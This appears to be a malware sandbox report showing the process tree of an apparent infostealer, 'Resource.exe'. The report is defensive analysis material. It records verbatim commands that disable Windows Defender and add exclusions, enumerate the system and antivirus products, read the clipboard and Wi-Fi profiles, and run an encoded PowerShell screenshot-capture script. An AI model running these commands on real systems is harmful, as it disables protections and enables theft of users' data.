  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,6457387986166077859,2676017473858874429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
  2⤵
  PID:1976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,6457387986166077859,2676017473858874429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
  2⤵
  PID:1092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,6457387986166077859,2676017473858874429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1
  2⤵
  PID:4652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1968,6457387986166077859,2676017473858874429,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5640 /prefetch:8
  2⤵
  PID:2936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1968,6457387986166077859,2676017473858874429,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5836 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4288
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1968,6457387986166077859,2676017473858874429,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6088 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,6457387986166077859,2676017473858874429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:1
  2⤵
  PID:3488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,6457387986166077859,2676017473858874429,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:1
  2⤵
  PID:2472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,6457387986166077859,2676017473858874429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1
  2⤵
  PID:4524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,6457387986166077859,2676017473858874429,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5220 /prefetch:1
  2⤵
  PID:2852
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1968,6457387986166077859,2676017473858874429,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5784 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:2452
- C:\Users\Admin\Downloads\Resource.exe
  "C:\Users\Admin\Downloads\Resource.exe"
  2⤵
  - Executes dropped EXE
  PID:4604
- - C:\Users\Admin\Downloads\Resource.exe
    "C:\Users\Admin\Downloads\Resource.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2944
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Resource.exe'"
      4⤵
      PID:1544
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Resource.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4376
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      PID:4304
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4624
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
      4⤵
      PID:2336
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4704
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "start bound.exe"
      4⤵
      PID:1280
    - - C:\Users\Admin\AppData\Local\Temp\bound.exe
        
        bound.exe
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4672
      - C:\Windows\SystemTemp\Google4672_2138514451\bin\updater.exe
        
        "C:\Windows\SystemTemp\Google4672_2138514451\bin\updater.exe" --install=appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={315C8B51-E03C-0233-04D0-9C97DD8F9176}&lang=de&browser=5&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-statsdef_1&installdataindex=empty --enable-logging --vmodule=*/components/winhttp/*=1,*/components/update_client/*=2,*/chrome/updater/*=2
        6⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:560
        
        C:\Windows\SystemTemp\Google4672_2138514451\bin\updater.exe
        
        C:\Windows\SystemTemp\Google4672_2138514451\bin\updater.exe --crash-handler --system "--database=C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad" --url=https://clients2.google.com/cr/report --annotation=prod=Update4 --annotation=ver=128.0.6597.0 "--attachment=C:\Program Files (x86)\Google\GoogleUpdater\updater.log" --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x8ec694,0x8ec6a0,0x8ec6ac
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4804
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --from-installer
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks system information in the registry
        Drops file in Windows directory
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3180
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=127.0.6533.89 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffd6bbce790,0x7ffd6bbce79c,0x7ffd6bbce7a8
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3140
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1964,i,13906040783336903191,1545813702074689098,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=1960 /prefetch:2
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4636
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=1792,i,13906040783336903191,1545813702074689098,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=1996 /prefetch:11
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1048
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --field-trial-handle=2220,i,13906040783336903191,1545813702074689098,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2392 /prefetch:13
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3388
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,13906040783336903191,1545813702074689098,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3200 /prefetch:1
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2704
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3164,i,13906040783336903191,1545813702074689098,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3176 /prefetch:1
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5512
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4444,i,13906040783336903191,1545813702074689098,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4504 /prefetch:1
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:924
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3140,i,13906040783336903191,1545813702074689098,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4660 /prefetch:1
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4944
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --field-trial-handle=4304,i,13906040783336903191,1545813702074689098,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4972 /prefetch:14
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1876
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:2460
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3880
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:3824
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4840
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
      4⤵
      PID:2968
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        5⤵
        
        PID:2768
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
      4⤵
      PID:2536
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        5⤵
        
        PID:5092
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:3332
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        Suspicious use of AdjustPrivilegeToken
        
        PID:2336
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:4860
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:2468
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:1480
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:2736
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3508
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:1512
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      PID:4860
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        
        PID:4460
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      PID:468
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:5380
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5136
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:5520
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5188
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5536
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      PID:5248
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:5476
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
      4⤵
      PID:5372
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        5⤵
        
        PID:5692
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:5396
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5724
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      PID:5416
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIA